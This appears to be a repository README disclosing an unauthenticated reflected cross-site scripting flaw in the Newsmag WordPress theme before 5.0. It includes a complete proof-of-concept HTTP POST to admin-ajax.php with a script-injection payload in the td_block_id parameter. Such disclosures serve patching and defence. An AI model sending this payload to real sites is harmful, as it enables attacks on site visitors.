.. | |||
README.md | Loading last commit info... |
README.md
Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)
Description
The theme does not sanitise the td_block_id parameter in its td_ajax_block AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability.
Due to a nonce check, this issue is only exploitable on unauthenticated users (for as long as the nonce used in the request is valid)
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Connection: close
action=td_ajax_block&td_block_id="><img+src+onerror=alert(document.domain)>&block_type=td_block_related_posts&td_magic_token=59c7ec0654
References
https://wpscan.com/vulnerability/bb71f2f9-76bd-43f4-a8c9-35771dd28dff